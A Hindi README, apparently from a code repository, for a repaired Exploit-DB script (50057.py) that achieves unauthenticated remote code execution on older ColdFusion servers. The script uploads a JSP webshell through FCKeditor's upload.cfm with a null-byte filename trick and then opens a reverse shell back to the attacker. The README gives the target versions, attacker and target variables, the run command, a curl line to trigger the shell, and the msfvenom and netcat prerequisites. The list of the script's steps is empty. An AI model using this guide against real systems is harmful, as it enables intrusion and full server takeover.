
exploitdb पर काम न करने वाली exploit स्क्रिप्ट (50057.py) के लिए fix
ColdFusion के साथ बंडल किए गए FCKeditor कंपोनेंट में मनमानी फ़ाइल अपलोड के माध्यम से अनऑथेंटिकेटेड रिमोट कोड एक्ज़ीक्यूशन। फ़ाइल अपलोड एंडपॉइंट filename पैरामीटर में null-byte इंजेक्शन स्वीकार करता है, जिससे एक JSP वेबशेल अपलोड हो सकता है और सर्वर द्वारा सीधे निष्पादित किया जा सकता है।
| Version | Status |
|---|
| ColdFusion 8.0 | Vulnerable |
| ColdFusion 8.0.1 | Vulnerable |
| ColdFusion 9.0 | Vulnerable* |
| ColdFusion MX 6.x | Vulnerable |
| ColdFusion MX 7.x | Vulnerable |
| ColdFusion 9.0.1+ | Patched |
| ColdFusion 10+ | Not affected |
*ColdFusion 9.0 यदि FCKeditor कंपोनेंट हटाया/अपडेट नहीं किया गया हो तो असुरक्षित है।
Patch: Adobe Security Bulletin APSB09-09 (July 2009).
स्क्रिप्ट के शीर्ष पर मौजूद वेरिएबल्स को संपादित करें:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
चलाएँ:
python3 poc.py
स्क्रिप्ट निम्नलिखित कार्य करेगी:
यदि शेल कुछ सेकंड के भीतर नहीं आता है, तो इसे मैन्युअल रूप से ट्रिगर करें:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
अपलोड के बाद फ़ाइल नाम stdout पर प्रिंट होता है।
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm